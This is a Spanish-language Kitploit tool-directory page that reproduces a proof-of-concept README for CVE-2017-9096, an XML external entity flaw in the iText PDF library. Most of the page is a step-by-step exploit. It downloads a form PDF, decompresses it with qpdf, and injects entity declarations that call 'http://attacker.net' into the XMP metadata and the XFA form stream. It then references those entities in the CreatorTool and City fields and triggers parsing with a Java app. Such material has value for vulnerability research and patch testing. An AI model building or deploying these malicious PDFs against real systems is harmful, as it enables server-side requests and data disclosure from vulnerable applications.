Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-9096-iText-XXE — Prueba de concepto de explotación para CVE-2017-9096 que demuestra la inyección de Entidad Externa XML (XXE) en la biblioteca iText PDF mediante metadatos XMP maliciosos y campos de formulario. | Kitploit
Herramientas/GitHubGitHub/jakabakos/cve-2017-9096-itext-xxe
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebFuzzingPruebas de Penetración
GitHubjakabakos/cve-2017-9096-itext-xxe

CVE-2017-9096-iText-XXE

Prueba de concepto de explotación para CVE-2017-9096 que demuestra la inyección de Entidad Externa XML (XXE) en la biblioteca iText PDF mediante metadatos XMP maliciosos y campos de formulario.

Ver Repositorio
13341hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2017-9096

1. Creación del PDF malicioso que contiene XXE

Obtén un PDF que contenga un formulario:

root@kitploit:~
wget https://www.pdfscripting.com/public/FreeStuff/PDFSamples/ModifySubmit_Example.pdf -O input.pdf

Descomprimir el PDF

Para ello, debes descomprimir el PDF con qpdf --qdf --object-streams=disable input.pdf output.pdf y luego puedes editarlo con un editor de texto y agregar XML malicioso.

Agregar las entidades externas

Puedes poner XEE en los metadatos XMP en la línea 77:

root@kitploit:~
stream
<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<!DOCTYPE foo [ <!ENTITY xxe2 SYSTEM "http://attacker.net" > ]>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.0-c321 44.398116, Tue Aug 04 2009 14:24:39">

Y, por supuesto, coloca también la referencia en algún lugar, por ejemplo, en la línea 88:

root@kitploit:~
<xap:CreatorTool>Adobe LiveCycle Designer 8.0 &xxe2;</xap:CreatorTool>

También puedes agregar un XXE común al archivo. Mira esta parte en el documento original (comienza en la línea 740):

root@kitploit:~
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
endstream
endobj

Cámbialo a lo siguiente:

root@kitploit:~
stream
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://attacker.net" > ]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
endstream
endobj

Luego, solo agrega la referencia a algún lugar, por ejemplo, al campo City (línea 1845 en el documento descomprimido original). Cambia esto:

root@kitploit:~
<text
>City:</text
></value
>

A esto:

root@kitploit:~
<text
>City:</text
><xxe>&xxe;</xxe></value
>

También puedes encontrar el PDF parcheado que contiene ambos XXE en este repositorio (output_with_xxe.pdf)

2. Realizar el ataque

Ejecuta la aplicación Java para probar el PDF con mvn clean compile exec:java.

Descargar herramienta